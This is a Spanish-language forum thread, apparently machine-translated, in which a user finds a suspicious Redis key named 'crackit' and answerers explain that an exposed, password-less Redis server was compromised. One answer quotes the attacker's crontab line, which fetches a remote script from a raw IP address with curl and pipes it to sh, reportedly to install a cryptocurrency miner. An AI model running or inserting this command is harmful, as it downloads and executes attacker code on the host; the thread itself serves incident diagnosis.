URL sospechosa en valor de clave redis

Navega tus respuestas
1

Cuando pongo keys * para obtener todos los pares, una clave se ha nombrado como

  

crackit

Luego uso el siguiente comando para obtener su valor 

get crackit

muestra la siguiente url, que parece sospechosa.

  

/ usr / bin / curl -fsSL enlace .

Los resultados de búsqueda de Google muestran un foro en idioma chino denominado como

  

https://www.v2ex.com/t/373529 (no entendí el idioma de este sitio)

Pensé que hay alguna intrusión. Inmediatamente borro todas las claves. No tengo idea de lo que sucede alrededor de mi redis

    
pregunta SuperKrish 13.07.2017 - 15:59
fuente

2 respuestas

2

Su servidor es accesible para todo el mundo y el proceso de Redis no está protegido por una contraseña. Esto permite que un cracker intente explotar a Redis para obtener acceso a su sistema.

Mis recomendaciones:

  1. Grabar el servidor
  2. Reinstale y configure al menos con una contraseña.
respondido por el Itamar Haber 13.07.2017 - 16:50
fuente
3

La URL del OP que se envió al foro mencionó que la redis del servidor de la nube para desarrolladores se ha comprometido, se ha agregado una entrada a crontab. es decir, 

*/1 * * * * /usr/bin/curl -fsSL http://162.242.245.65:8220/test9.sh | sh

El resto del comentarista mencionó que este es un posible hack que instala mineros de Bitcoin dentro del sistema.

Estoy de acuerdo con @Itamar Haber, debes volver a implementar tu servidor desde cero. La simple limpieza de la aplicación no es suficiente.

    
respondido por el mootmoot 13.07.2017 - 19:01
fuente

Lea otras preguntas en las etiquetas

¿Hay alguna forma en que todas las personas en mi wifi puedan ver que uso TOR? [duplicar] El acceso remoto a través de la máquina virtual, ¿pondrá en peligro la red?